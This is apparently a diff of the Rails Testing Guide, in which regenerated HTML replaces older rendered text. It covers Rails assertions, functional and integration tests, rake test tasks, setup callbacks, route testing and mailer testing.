    Ensures that executing the method listed in array[1] on the object in array[0] with the parameters of array[2 and up] is true. This one is weird eh?

    flunk( [msg] )

    Ensures failure. This is useful to explicitly mark a test that isn’t finished yet.

    +
    +

    Because of the modular nature of the testing framework, it is possible to create your own assertions. In fact, that’s exactly what Rails does. It includes some specialized assertions to make your life easier.

    +
    + + + +
    +Note +Creating your own assertions is an advanced topic that we won’t cover in this tutorial.
    +
    +

    3.5. Rails Specific Assertions

    +

    Rails adds some custom assertions of its own to the test/unit framework:

    +
    + +++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Assertion Purpose

    assert_valid(record)

    Ensures that the passed record is valid by Active Record standards and returns any error messages if it is not.

    assert_difference(expressions, difference = 1, message = nil) {...}

    Test numeric difference between the return value of an expression as a result of what is evaluated in the yielded block.

    assert_no_difference(expressions, message = nil, &block)

    Asserts that the numeric result of evaluating an expression is not changed before and after invoking the passed in block.

    assert_recognizes(expected_options, path, extras={}, message=nil)

    Asserts that the routing of the given path was handled correctly and that the parsed options (given in the expected_options hash) match path. Basically, it asserts that Rails recognizes the route given by expected_options.

    assert_generates(expected_path, options, defaults={}, extras = {}, message=nil)

    Asserts that the provided options can be used to generate the provided path. This is the inverse of assert_recognizes. The extras parameter is used to tell the request the names and values of additional request parameters that would be in a query string. The message parameter allows you to specify a custom error message for assertion failures.

    assert_response(type, message = nil)

    Asserts that the response comes with a specific status code. You can specify :success to indicate 200, :redirect to indicate 300-399, :missing to indicate 404, or :error to match the 500-599 range

    assert_redirected_to(options = {}, message=nil)

    Assert that the redirection options passed in match those of the redirect called in the latest action. This match can be partial, such that assert_redirected_to(:controller => "weblog") will also match the redirection of redirect_to(:controller => "weblog", :action => "show") and so on.

    assert_template(expected = nil, message=nil)

    Asserts that the request was rendered with the appropriate template file.

    +
    +

    You’ll see the usage of some of these assertions in the next chapter.

    + +

    4. Functional Tests for Your Controllers

    +
    +

    In Rails, testing the various actions of a single controller is called writing functional tests for that controller. Controllers handle the incoming web requests to your application and eventually respond with a rendered view.

    +

    4.1. What to include in your Functional Tests

    +

    You should test for things such as:

    +
      +
    • +

      +was the web request successful? +

      +
    • +
    • +

      +was the user redirected to the right page? +

      +
    • +
    • +

      +was the user successfully authenticated? +

      +
    • +
    • +

      +was the correct object stored in the response template? +

      +
    • +
    • +

      +was the appropriate message displayed to the user in the view +

      +
    • +
    +

    Now that we have used Rails scaffold generator for our Post resource, it has already created the controller code and functional tests. You can take look at the file posts_controller_test.rb in the test/functional directory.

    +

    Let me take you through one such test, test_should_get_index from the file posts_controller_test.rb.

    -
    -
    
    -Because of the modular nature of the testing framework, it is possible to create your own assertions. In fact, that's exactly what Rails does. It includes some specialized assertions to make your life easier.
    -
    -NOTE: Creating your own assertions is an advanced topic that we won't cover in this tutorial.
    -
    -=== Rails Specific Assertions ===
    -
    -Rails adds some custom assertions of its own to the +test/unit+ framework:
    -
    -[grid="all"]
    -`----------------------------------------------------------------------------------`-------------------------------------------------------
    -Assertion                                                                          Purpose
    -
    -

    assert_valid(record) Ensures that the passed record is valid by Active Record standards and returns any error messages if it is not. -assert_difference(expressions, difference = 1, message = nil) {|| …} Test numeric difference between the return value of an expression as a result of what is evaluated in the yielded block. -assert_no_difference(expressions, message = nil, &block) Asserts that the numeric result of evaluating an expression is not changed before and after invoking the passed in block. -assert_recognizes(expected_options, path, extras={}, message=nil) Asserts that the routing of the given path was handled correctly and that the parsed options (given in the expected_options hash) match path. Basically, it asserts that Rails recognizes the route given by expected_options. -assert_generates(expected_path, options, defaults={}, extras = {}, message=nil) Asserts that the provided options can be used to generate the provided path. This is the inverse of assert_recognizes. The extras parameter is used to tell the request the names and values of additional request parameters that would be in a query string. The message parameter allows you to specify a custom error message for assertion failures. -assert_response(type, message = nil) Asserts that the response comes with a specific status code. You can specify :success to indicate 200, :redirect to indicate 300-399, :missing to indicate 404, or :error to match the 500-599 range -assert_redirected_to(options = {}, message=nil) Assert that the redirection options passed in match those of the redirect called in the latest action. This match can be partial, such that assert_redirected_to(:controller ⇒ "weblog") will also match the redirection of redirect_to(:controller ⇒ "weblog", :action ⇒ "show") and so on. -assert_template(expected = nil, message=nil) Asserts that the request was rendered with the appropriate template file.

    +
    +
    def test_should_get_index
    +  get :index
    +  assert_response :success
    +  assert_not_nil assigns(:posts)
    +end
    +

    In the test_should_get_index test, Rails simulates a request on the action called index, making sure the request was successful and also ensuring that it assigns a valid posts instance variable.

    +

    The get method kicks off the web request and populates the results into the response. It accepts 4 arguments:

    +
      +
    • +

      +The action of the controller you are requesting. This can be in the form of a string or a symbol. +

      +
    • +
    • +

      +An optional hash of request parameters to pass into the action (eg. query string parameters or post variables). +

      +
    • +
    • +

      +An optional hash of session variables to pass along with the request. +

      +
    • +
    • +

      +An optional hash of flash values. +

      +
    • +
    +

    Example: Calling the :show action, passing an id of 12 as the params and setting a user_id of 5 in the session:

    -
    -
    
    -You'll see the usage of some of these assertions in the next chapter.
    -
    -== Functional Tests for Your Controllers ==
    -
    -In Rails, testing the various actions of a single controller is called writing functional tests for that controller. Controllers handle the incoming web requests to your application and eventually respond with a rendered view.
    -
    -=== What to include in your Functional Tests ===
    -
    -You should test for things such as:
    -
    - * was the web request successful?
    - * was the user redirected to the right page?
    - * was the user successfully authenticated?
    - * was the correct object stored in the response template?
    - * was the appropriate message displayed to the user in the view
    -
    -Now that we have used Rails scaffold generator for our +Post+ resource, it has already created the controller code and functional tests. You can take look at the file +posts_controller_test.rb+ in the +test/functional+ directory.
    -
    -Let me take you through one such test, +test_should_get_index+ from the file +posts_controller_test.rb+.
    -
    -[source,ruby]
    -
    -

    def test_should_get_index - get :index - assert_response :success - assert_not_nil assigns(:posts) -end

    +
    +
    get(:show, {'id' => "12"}, {'user_id' => 5})
    +

    Another example: Calling the :view action, passing an id of 12 as the params, this time with no session, but with a flash message.

    -
    -
    
    -In the +test_should_get_index+ test, Rails simulates a request on the action called index, making sure the request was successful and also ensuring that it assigns a valid +posts+ instance variable.
    -
    -The +get+ method kicks off the web request and populates the results into the response. It accepts 4 arguments:
    -
    -* The action of the controller you are requesting. This can be in the form of a string or a symbol.
    -* An optional hash of request parameters to pass into the action (eg. query string parameters or post variables).
    -* An optional hash of session variables to pass along with the request.
    -* An optional hash of flash values.
    -
    -Example: Calling the +:show+ action, passing an +id+ of 12 as the +params+ and setting a +user_id+ of 5 in the session:
    -
    -[source,ruby]
    -
    -

    get(:show, {id ⇒ "12"}, {user_id ⇒ 5})

    +
    +
    get(:view, {'id' => '12'}, nil, {'message' => 'booya!'})
    +
    + + + +
    +Note +If you try running test_should_create_post test from posts_controller_test.rb it will fail on account of the newly added model level validation and rightly so.
    +
    +

    Let us modify test_should_create_post test in posts_controller_test.rb so that all our test pass:

    -
    -
    
    -Another example: Calling the +:view+ action, passing an +id+ of 12 as the +params+, this time with no session, but with a flash message.
    +
    +
    def test_should_create_post
    +  assert_difference('Post.count') do
    +    post :create, :post => { :title => 'Some title'}
    +  end
     
    -[source,ruby]
    -
    -

    get(:view, {id12}, nil, {messagebooya!})

    + assert_redirected_to post_path(assigns(:post)) +end
    +

    Now you can try running all the tests and they should pass.

    +

    4.2. Available Request Types for Functional Tests

    +

    If you’re familiar with the HTTP protocol, you’ll know that get is a type of request. There are 5 request types supported in Rails functional tests:

    +
      +
    • +

      +get +

      +
    • +
    • +

      +post +

      +
    • +
    • +

      +put +

      +
    • +
    • +

      +head +

      +
    • +
    • +

      +delete +

      +
    • +
    +

    All of request types are methods that you can use, however, you’ll probably end up using the first two more often than the others.

    +

    4.3. The 4 Hashes of the Apocalypse

    +

    After a request has been made by using one of the 5 methods (get, post, etc.) and processed, you will have 4 Hash objects ready for use:

    +
      +
    • +

      +assigns - Any objects that are stored as instance variables in actions for use in views. +

      +
    • +
    • +

      +cookies - Any cookies that are set. +

      +
    • +
    • +

      +flash - Any objects living in the flash. +

      +
    • +
    • +

      +session - Any object living in session variables. +

      +
    • +
    +

    As is the case with normal Hash objects, you can access the values by referencing the keys by string. You can also reference them by symbol name, except for assigns. For example:

    -
    -
    
    -NOTE: If you try running +test_should_create_post+ test from +posts_controller_test.rb+ it will fail on account of the newly added model level validation and rightly so.
    -
    -Let us modify +test_should_create_post+ test in +posts_controller_test.rb+ so that all our test pass:
    -
    -[source,ruby]
    -
    -

    def test_should_create_post - assert_difference(Post.count) do - post :create, :post ⇒ { :title ⇒ Some title} - end

    -
    -
    -
      assert_redirected_to post_path(assigns(:post))
    -end
    -
    +
    +
      flash["gordon"]               flash[:gordon]
    +  session["shmession"]          session[:shmession]
    +  cookies["are_good_for_u"]     cookies[:are_good_for_u]
    +
    +# Because you can't use assigns[:something] for historical reasons:
    +  assigns["something"]          assigns(:something)
    +

    4.4. Instance Variables Available

    +

    You also have access to three instance variables in your functional tests:

    +
      +
    • +

      +@controller - The controller processing the request +

      +
    • +
    • +

      +@request - The request +

      +
    • +
    • +

      +@response - The response +

      +
    • +
    +

    4.5. A Fuller Functional Test Example

    +

    Here’s another example that uses flash, assert_redirected_to, and assert_difference:

    -
    -
    
    -Now you can try running all the tests and they should pass.
    -
    -=== Available Request Types for Functional Tests ===
    -
    -If you're familiar with the HTTP protocol, you'll know that +get+ is a type of request. There are 5 request types supported in Rails functional tests:
    -
    -* +get+
    -* +post+
    -* +put+
    -* +head+
    -* +delete+
    -
    -All of request types are methods that you can use, however, you'll probably end up using the first two more often than the others.
    -
    -=== The 4 Hashes of the Apocalypse ===
    -
    -After a request has been made by using one of the 5 methods (+get+, +post+, etc.) and processed, you will have 4 Hash objects ready for use:
    -
    -* +assigns+ - Any objects that are stored as instance variables in actions for use in views.
    -* +cookies+ - Any cookies that are set.
    -* +flash+ - Any objects living in the flash.
    -* +session+ - Any object living in session variables.
    -
    -As is the case with normal Hash objects, you can access the values by referencing the keys by string. You can also reference them by symbol name, except for +assigns+. For example:
    -
    -[source,ruby]
    -
    -
    -
    -
    flash["gordon"]               flash[:gordon]
    -session["shmession"]          session[:shmession]
    -cookies["are_good_for_u"]     cookies[:are_good_for_u]
    -
    -

    # Because you can't use assigns[:something] for historical reasons: - assigns["something"] assigns(:something)

    +
    +
    def test_should_create_post
    +  assert_difference('Post.count') do
    +    post :create, :post => { :title => 'Hi', :body => 'This is my first post.'}
    +  end
    +  assert_redirected_to post_path(assigns(:post))
    +  assert_equal 'Post was successfully created.', flash[:notice]
    +end
    +

    4.6. Testing Views

    +

    Testing the response to your request by asserting the presence of key HTML elements and their content is a useful way to test the views of your application. The assert_select assertion allows you to do this by using a simple yet powerful syntax.

    +
    + + + +
    +Note +You may find references to assert_tag in other documentation, but this is now deprecated in favor of assert_select.
    +
    +

    There are two forms of assert_select:

    +

    assert_select(selector, [equality], [message])` ensures that the equality condition is met on the selected elements through the selector. The selector may be a CSS selector expression (String), an expression with substitution values, or an HTML::Selector object.

    +

    assert_select(element, selector, [equality], [message]) ensures that the equality condition is met on all the selected elements through the selector starting from the element (instance of HTML::Node) and its descendants.

    +

    For example, you could verify the contents on the title element in your response with:

    -
    -
    
    -=== Instance Variables Available ===
    -
    -You also have access to three instance variables in your functional tests:
    -
    -* +@controller+ - The controller processing the request
    -* +@request+ - The request
    -* +@response+ - The response
    -
    -=== A Fuller Functional Test Example
    -
    -Here's another example that uses +flash+, +assert_redirected_to+, and +assert_difference+:
    -
    -[source,ruby]
    -
    -

    def test_should_create_post - assert_difference(Post.count) do - post :create, :post ⇒ { :title ⇒ Hi, :body ⇒ This is my first post.} - end - assert_redirected_to post_path(assigns(:post)) - assert_equal Post was successfully created., flash[:notice] -end

    +
    +
    assert_select 'title', "Welcome to Rails Testing Guide"
    +

    You can also use nested assert_select blocks. In this case the inner assert_select will run the assertion on each element selected by the outer assert_select block:

    -
    -
    
    -=== Testing Views ===
    -
    -Testing the response to your request by asserting the presence of key HTML elements and their content is a useful way to test the views of your application. The +assert_select+ assertion allows you to do this by using a simple yet powerful syntax.
    -
    -NOTE: You may find references to +assert_tag+ in other documentation, but this is now deprecated in favor of +assert_select+.
    -
    -There are two forms of +assert_select+:
    -
    -+assert_select(selector, [equality], [message])`+ ensures that the equality condition is met on the selected elements through the selector. The selector may be a CSS selector expression (String), an expression with substitution values, or an +HTML::Selector+ object.
    -
    -+assert_select(element, selector, [equality], [message])+ ensures that the equality condition is met on all the selected elements through the selector starting from the _element_ (instance of +HTML::Node+) and its descendants.
    -
    -For example, you could verify the contents on the title element in your response with:
    -
    -[source,ruby]
    -
    -

    assert_select title, "Welcome to Rails Testing Guide"

    +
    +
    assert_select 'ul.navigation' do
    +  assert_select 'li.menu_item'
    +end
    +

    The assert_select assertion is quite powerful. For more advanced usage, refer to its documentation.

    +

    4.6.1. Additional View-based Assertions

    +

    There are more assertions that are primarily used in testing views:

    +
    + +++ + + + + + + + + + + + + + + + + + + + + + + + +
    Assertion Purpose

    assert_select_email

    Allows you to make assertions on the body of an e-mail.

    assert_select_rjs

    Allows you to make assertions on RJS response. assert_select_rjs has variants which allow you to narrow down on the updated element or even a particular operation on an element.

    assert_select_encoded

    Allows you to make assertions on encoded HTML. It does this by un-encoding the contents of each element and then calling the block with all the un-encoded elements.

    css_select(selector) or css_select(element, selector)

    Returns an array of all the elements selected by the selector. In the second variant it first matches the base element and tries to match the selector expression on any of its children. If there are no matches both variants return an empty array.

    +
    +

    Here’s an example of using assert_select_email:

    -
    -
    
    -You can also use nested +assert_select+ blocks. In this case the inner +assert_select+ will run the assertion on each element selected by the outer `assert_select` block:
    -
    -[source,ruby]
    -
    -

    assert_select ul.navigation do - assert_select li.menu_item -end

    +
    +
    assert_select_email do
    +  assert_select 'small', 'Please click the "Unsubscribe" link if you want to opt-out.'
    +end
    + +

    5. Integration Testing

    +
    +

    Integration tests are used to test the interaction among any number of controllers. They are generally used to test important work flows within your application.

    +

    Unlike Unit and Functional tests, integration tests have to be explicitly created under the test/integration folder within your application. Rails provides a generator to create an integration test skeleton for you.

    -
    -
    
    -The +assert_select+ assertion is quite powerful. For more advanced usage, refer to its link:http://api.rubyonrails.com/classes/ActionController/Assertions/SelectorAssertions.html#M000749[documentation].
    -
    -==== Additional View-based Assertions ====
    -
    -There are more assertions that are primarily used in testing views:
    -
    -[grid="all"]
    -`----------------------------------------------------------------------------------`-------------------------------------------------------
    -Assertion                                                                          Purpose
    -
    -

    assert_select_email Allows you to make assertions on the body of an e-mail. -assert_select_rjs Allows you to make assertions on RJS response. assert_select_rjs has variants which allow you to narrow down on the updated element or even a particular operation on an element. -assert_select_encoded Allows you to make assertions on encoded HTML. It does this by un-encoding the contents of each element and then calling the block with all the un-encoded elements. -css_select(selector) or css_select(element, selector) Returns an array of all the elements selected by the selector. In the second variant it first matches the base element and tries to match the selector expression on any of its children. If there are no matches both variants return an empty array.

    +
    +
    $ script/generate integration_test user_flows
    +      exists  test/integration/
    +      create  test/integration/user_flows_test.rb
    +

    Here’s what a freshly-generated integration test looks like:

    -
    -
    
    -Here's an example of using +assert_select_email+:
    +
    +
    require 'test_helper'
     
    -[source,ruby]
    -
    -

    assert_select_email do - assert_select small, Please click the "Unsubscribe" link if you want to opt-out. -end

    +class UserFlowsTest < ActionController::IntegrationTest + # fixtures :your, :models + + # Replace this with your real tests. + def test_truth + assert true + end +end
    +

    Integration tests inherit from ActionController::IntegrationTest. This makes available some additional helpers to use in your integration tests. Also you need to explicitly include the fixtures to be made available to the test.

    +

    5.1. Helpers Available for Integration tests

    +

    In addition to the standard testing helpers, there are some additional helpers available to integration tests:

    +
    + +++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Helper Purpose

    https?

    Returns true if the session is mimicking a secure HTTPS request.

    https!

    Allows you to mimic a secure HTTPS request.

    host!

    Allows you to set the host name to use in the next request.

    redirect?

    Returns true if the last request was a redirect.

    follow_redirect!

    Follows a single redirect response.

    request_via_redirect(http_method, path, [parameters], [headers])

    Allows you to make an HTTP request and follow any subsequent redirects.

    post_via_redirect(path, [parameters], [headers])

    Allows you to make an HTTP POST request and follow any subsequent redirects.

    get_via_redirect(path, [parameters], [headers])

    Allows you to make an HTTP GET request and follow any subsequent redirects.

    put_via_redirect(path, [parameters], [headers])

    Allows you to make an HTTP PUT request and follow any subsequent redirects.

    delete_via_redirect(path, [parameters], [headers])

    Allows you to make an HTTP DELETE request and follow any subsequent redirects.

    open_session

    Opens a new session instance.

    +
    +

    5.2. Integration Testing Examples

    +

    A simple integration test that exercises multiple controllers:

    -
    -
    
    -== Integration Testing ==
    +
    +
    require 'test_helper'
     
    -Integration tests are used to test the interaction among any number of controllers. They are generally used to test important work flows within your application.
    +class UserFlowsTest < ActionController::IntegrationTest
    +  fixtures :users
     
    -Unlike Unit and Functional tests, integration tests have to be explicitly created under the 'test/integration' folder within your application. Rails provides a generator to create an integration test skeleton for you.
    +  def test_login_and_browse_site
    +    # login via https
    +    https!
    +    get "/login"
    +    assert_response :success
     
    -[source, shell]
    -
    -

    $ script/generate integration_test user_flows - exists test/integration/ - create test/integration/user_flows_test.rb

    -
    -
    -
    
    -Here's what a freshly-generated integration test looks like:
    +    post_via_redirect "/login", :username => users(:avs).username, :password => users(:avs).password
    +    assert_equal '/welcome', path
    +    assert_equal 'Welcome avs!', flash[:notice]
     
    -[source,ruby]
    -
    -

    require test_helper

    -

    class UserFlowsTest < ActionController::IntegrationTest - # fixtures :your, :models

    -
    -
    -
      # Replace this with your real tests.
    -  def test_truth
    -    assert true
    -  end
    -end
    -
    + https!(false) + get "/posts/all" + assert_response :success + assert assigns(:products) + end +end
    +

    As you can see the integration test involves multiple controllers and exercises the entire stack from database to dispatcher. In addition you can have multiple session instances open simultaneously in a test and extend those instances with assertion methods to create a very powerful testing DSL (domain-specific language) just for your application.

    +

    Here’s an example of multiple sessions and custom DSL in an integration test

    -
    -
    
    -Integration tests inherit from +ActionController::IntegrationTest+. This makes available some additional helpers to use in your integration tests. Also you need to explicitly include the fixtures to be made available to the test.
    +
    +
    require 'test_helper'
     
    -=== Helpers Available for Integration tests ===
    +class UserFlowsTest < ActionController::IntegrationTest
    +  fixtures :users
     
    -In addition to the standard testing helpers, there are some additional helpers available to integration tests:
    +  def test_login_and_browse_site
     
    -[grid="all"]
    -`----------------------------------------------------------------------------------`-------------------------------------------------------
    -Helper                                                                             Purpose
    -
    -

    https? Returns true if the session is mimicking a secure HTTPS request. -https! Allows you to mimic a secure HTTPS request. -host! Allows you to set the host name to use in the next request. -redirect? Returns true if the last request was a redirect. -follow_redirect! Follows a single redirect response. -request_via_redirect(http_method, path, [parameters], [headers]) Allows you to make an HTTP request and follow any subsequent redirects. -post_via_redirect(path, [parameters], [headers]) Allows you to make an HTTP POST request and follow any subsequent redirects. -get_via_redirect(path, [parameters], [headers]) Allows you to make an HTTP GET request and follow any subsequent redirects. -put_via_redirect(path, [parameters], [headers]) Allows you to make an HTTP PUT request and follow any subsequent redirects. -delete_via_redirect(path, [parameters], [headers]) Allows you to make an HTTP DELETE request and follow any subsequent redirects. -open_session Opens a new session instance.

    -
    -
    -
    
    -=== Integration Testing Examples ===
    +    # User avs logs in
    +    avs = login(:avs)
    +    # User guest logs in
    +    guest = login(:guest)
     
    -A simple integration test that exercises multiple controllers:
    +    # Both are now available in different sessions
    +    assert_equal 'Welcome avs!', avs.flash[:notice]
    +    assert_equal 'Welcome guest!', guest.flash[:notice]
     
    -[source,ruby]
    -
    -

    require test_helper

    -

    class UserFlowsTest < ActionController::IntegrationTest - fixtures :users

    -
    -
    -
    def test_login_and_browse_site
    -  # login via https
    -  https!
    -  get "/login"
    -  assert_response :success
    -
    -
    -
    -
    post_via_redirect "/login", :username => users(:avs).username, :password => users(:avs).password
    -assert_equal '/welcome', path
    -assert_equal 'Welcome avs!', flash[:notice]
    -
    -
    -
    -
        https!(false)
    -    get "/posts/all"
    -    assert_response :success
    -    assert assigns(:products)
    -  end
    -end
    -
    -
    -
    -
    
    -As you can see the integration test involves multiple controllers and exercises the entire stack from database to dispatcher. In addition you can have multiple session instances open simultaneously in a test and extend those instances with assertion methods to create a very powerful testing DSL (domain-specific language) just for your application.
    +    # User avs can browse site
    +    avs.browses_site
    +    # User guest can browse site aswell
    +    guest.browses_site
     
    -Here's an example of multiple sessions and custom DSL in an integration test
    +    # Continue with other assertions
    +  end
     
    -[source,ruby]
    -
    -

    require test_helper

    -

    class UserFlowsTest < ActionController::IntegrationTest - fixtures :users

    -
    -
    -
    def test_login_and_browse_site
    -
    -
    -
    -
    # User avs logs in
    -avs = login(:avs)
    -# User guest logs in
    -guest = login(:guest)
    -
    -
    -
    -
    # Both are now available in different sessions
    -assert_equal 'Welcome avs!', avs.flash[:notice]
    -assert_equal 'Welcome guest!', guest.flash[:notice]
    -
    -
    -
    -
    # User avs can browse site
    -avs.browses_site
    -# User guest can browse site aswell
    -guest.browses_site
    -
    -
    -
    -
      # Continue with other assertions
    -end
    -
    -
    -
    -
    private
    -
    -
    -
    -
    module CustomDsl
    -  def browses_site
    -    get "/products/all"
    -    assert_response :success
    -    assert assigns(:products)
    -  end
    -end
    -
    -
    -
    -
        def login(user)
    -      open_session do |sess|
    -        sess.extend(CustomDsl)
    -        u = users(user)
    -        sess.https!
    -        sess.post "/login", :username => u.username, :password => u.password
    -        assert_equal '/welcome', path
    -        sess.https!(false)
    -      end
    -    end
    -end
    -
    -
    -
    -
    
    -== Rake Tasks for Running your Tests ==
    +  private
     
    -You don't need to set up and run your tests by hand on a test-by-test basis. Rails comes with a number of rake tasks to help in testing. The table below lists all rake tasks that come along in the default Rakefile when you initiate a Rail project.
    +    module CustomDsl
    +      def browses_site
    +        get "/products/all"
    +        assert_response :success
    +        assert assigns(:products)
    +      end
    +    end
     
    -[grid="all"]
    -
    -

    Tasks Description

    -
    -
    -
    +rake test+                     Runs all unit, functional and integration tests. You can also simply run +rake+ as the _test_ target is the default.
    -+rake test:units+               Runs all the unit tests from +test/unit+
    -+rake test:functionals+         Runs all the functional tests from +test/functional+
    -+rake test:integration+         Runs all the integration tests from +test/integration+
    -+rake test:recent+              Tests recent changes
    -+rake test:uncommitted+         Runs all the tests which are uncommitted. Only supports Subversion
    -+rake test:plugins+             Run all the plugin tests from +vendor/plugins/*/**/test+ (or specify with +PLUGIN=_name_+)
    -
    + def login(user) + open_session do |sess| + sess.extend(CustomDsl) + u = users(user) + sess.https! + sess.post "/login", :username => u.username, :password => u.password + assert_equal '/welcome', path + sess.https!(false) + end + end +end
    + +

    6. Rake Tasks for Running your Tests

    +
    +

    You don’t need to set up and run your tests by hand on a test-by-test basis. Rails comes with a number of rake tasks to help in testing. The table below lists all rake tasks that come along in the default Rakefile when you initiate a Rail project.

    +
    + +++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Tasks Description

    rake test

    Runs all unit, functional and integration tests. You can also simply run rake as the test target is the default.

    rake test:units

    Runs all the unit tests from test/unit

    rake test:functionals

    Runs all the functional tests from test/functional

    rake test:integration

    Runs all the integration tests from test/integration

    rake test:recent

    Tests recent changes

    rake test:uncommitted

    Runs all the tests which are uncommitted. Only supports Subversion

    rake test:plugins

    Run all the plugin tests from vendor/plugins//*/test (or specify with PLUGIN=name)

    +
    -

    4. Brief Note About Test::Unit

    +

    7. Brief Note About Test::Unit

    -

    Ruby ships with a boat load of libraries. One little gem of a library is Test::Unit, a framework for unit testing in Ruby. All the basic assertions discussed above are actually defined in Test::Unit::Assertions. The class ActiveSupport::TestCase which we have been using in our unit and functional tests extends Test::Unit::TestCase that it is how we can use all the basic assertions in our tests.

    +

    Ruby ships with a boat load of libraries. One little gem of a library is Test::Unit, a framework for unit testing in Ruby. All the basic assertions discussed above are actually defined in Test::Unit::Assertions. The class ActiveSupport::TestCase which we have been using in our unit and functional tests extends Test::Unit::TestCase that it is how we can use all the basic assertions in our tests.

    @@ -1158,9 +1446,9 @@ You don't need to set up and run your tests by hand on a test-by-test basis. Rai
    -

    5. Setup and Teardown

    +

    8. Setup and Teardown

    -

    If you would like to run a block of code before the start of each test and another block of code after the end of each test you have two special callbacks for your rescue. Let's take note of this by looking at an example for our functional test in Posts controller:

    +

    If you would like to run a block of code before the start of each test and another block of code after the end of each test you have two special callbacks for your rescue. Let’s take note of this by looking at an example for our functional test in Posts controller:

    assert_redirected_to posts_path end -end -
    -

    Above, the setup method is called before each test and so @post is available for each of the tests. Rails implements setup and teardown as ActiveSupport::Callbacks. Which essentially means you need not only use setup and teardown as methods in your tests. You could specify them by using:

    -
      +end
    +

    Above, the setup method is called before each test and so @post is available for each of the tests. Rails implements setup and teardown as ActiveSupport::Callbacks. Which essentially means you need not only use setup and teardown as methods in your tests. You could specify them by using:

    +
    • a block @@ -1221,7 +1508,7 @@ a lambda

    -

    Let's see the earlier example by specifying setup callback by specifying a method name as a symbol:

    +

    Let’s see the earlier example by specifying setup callback by specifying a method name as a symbol:

    @post = posts(:one) end -end -
    +end -

    6. Testing Routes

    +

    9. Testing Routes

    -

    Like everything else in you Rails application, it's recommended to test you routes. An example test for a route in the default show action of Posts controller above should look like:

    +

    Like everything else in you Rails application, it’s recommended to test you routes. An example test for a route in the default show action of Posts controller above should look like:

    def test_should_route_to_post
       assert_routing '/posts/1', { :controller => "posts", :action => "show", :id => "1" }
    -end
    -
    +end
    -

    7. Testing Your Mailers

    +

    10. Testing Your Mailers

    -

    Testing mailer classes requires some specific tools to do a thorough job.

    -

    7.1. Keeping the Postman in Check

    -

    Your ActionMailer classes — like every other part of your Rails application — should be tested to ensure that it is working as expected.

    -

    The goals of testing your ActionMailer classes are to ensure that:

    -
      +

      Testing mailer classes requires some specific tools to do a thorough job.

      +

      10.1. Keeping the Postman in Check

      +

      Your ActionMailer classes — like every other part of your Rails application — should be tested to ensure that it is working as expected.

      +

      The goals of testing your ActionMailer classes are to ensure that:

      +
      • emails are being processed (created and sent) @@ -1302,15 +1587,15 @@ the right emails are being sent at the right times

      -

      7.1.1. From All Sides

      -

      There are two aspects of testing your mailer, the unit tests and the functional tests. In the unit tests, you run the mailer in isolation with tightly controlled inputs and compare the output to a knownvalue (a fixture — yay! more fixtures!). In the functional tests you don't so much test the minute details produced by the mailer Instead we test that our controllers and models are using the mailer in the right way. You test to prove that the right email was sent at the right time.

      -

      7.2. Unit Testing

      -

      In order to test that your mailer is working as expected, you can use unit tests to compare the actual results of the mailer with pre-written examples of what should be produced.

      -

      7.2.1. Revenge of the Fixtures

      -

      For the purposes of unit testing a mailer, fixtures are used to provide an example of how the output should look. Because these are example emails, and not Active Record data like the other fixtures, they are kept in their own subdirectory apart from the other fixtures. The name of the directory within test/fixtures directly corresponds to the name of the mailer. So, for a mailer named UserMailer, the fixtures should reside in test/fixtures/user_mailer directory.

      -

      When you generated your mailer, the generator creates stub fixtures for each of the mailers actions. If you didn't use the generator you'll have to make those files yourself.

      -

      7.2.2. The Basic Test case

      -

      Here's a unit test to test a mailer named UserMailer whose action invite is used to send an invitation to a friend. It is an adapted version of the base test created by the generator for an invite action.

      +

      10.1.1. From All Sides

      +

      There are two aspects of testing your mailer, the unit tests and the functional tests. In the unit tests, you run the mailer in isolation with tightly controlled inputs and compare the output to a knownvalue (a fixture — yay! more fixtures!). In the functional tests you don’t so much test the minute details produced by the mailer Instead we test that our controllers and models are using the mailer in the right way. You test to prove that the right email was sent at the right time.

      +

      10.2. Unit Testing

      +

      In order to test that your mailer is working as expected, you can use unit tests to compare the actual results of the mailer with pre-written examples of what should be produced.

      +

      10.2.1. Revenge of the Fixtures

      +

      For the purposes of unit testing a mailer, fixtures are used to provide an example of how the output should look. Because these are example emails, and not Active Record data like the other fixtures, they are kept in their own subdirectory apart from the other fixtures. The name of the directory within test/fixtures directly corresponds to the name of the mailer. So, for a mailer named UserMailer, the fixtures should reside in test/fixtures/user_mailer directory.

      +

      When you generated your mailer, the generator creates stub fixtures for each of the mailers actions. If you didn’t use the generator you’ll have to make those files yourself.

      +

      10.2.2. The Basic Test case

      +

      Here’s a unit test to test a mailer named UserMailer whose action invite is used to send an invitation to a friend. It is an adapted version of the base test created by the generator for an invite action.

      assert_equal @expected.encoded, UserMailer.create_invite('me@example.com', 'friend@example.com', @expected.date).encoded end -end -
      -

      In this test, @expected is an instance of TMail::Mail that you can use in your tests. It is defined in ActionMailer::TestCase. The test above uses @expected to construct an email, which it then asserts with email created by the custom mailer. The invite fixture is the body of the email and is used as the sample content to assert against. The helper read_fixture is used to read in the content from this file.

      -

      Here's the content of the invite fixture:

      +end
    +

    In this test, @expected is an instance of TMail::Mail that you can use in your tests. It is defined in ActionMailer::TestCase. The test above uses @expected to construct an email, which it then asserts with email created by the custom mailer. The invite fixture is the body of the email and is used as the sample content to assert against. The helper read_fixture is used to read in the content from this file.

    +

    Here’s the content of the invite fixture:

    Hi friend@example.com,
    @@ -1342,10 +1626,10 @@ You have been invited.
     
     Cheers!
    -

    This is the right time to understand a little more about writing tests for your mailers. The line ActionMailer::Base.delivery_method = :test in config/environments/test.rb sets the delivery method to test mode so that email will not actually be delivered (useful to avoid spamming your users while testing) but instead it will be appended to an array (ActionMailer::Base.deliveries).

    -

    However often in unit tests, mails will not actually be sent, simply constructed, as in the example above, where the precise content of the email is checked against what it should be.

    -

    7.3. Functional Testing

    -

    Functional testing for mailers involves more than just checking that the email body, recipients and so forth are correct. In functional mail tests you call the mail deliver methods and check that the appropriate emails have been appended to the delivery list. It is fairly safe to assume that the deliver methods themselves do their job You are probably more interested in is whether your own business logic is sending emails when you expect them to got out. For example, you can check that the invite friend operation is sending an email appropriately:

    +

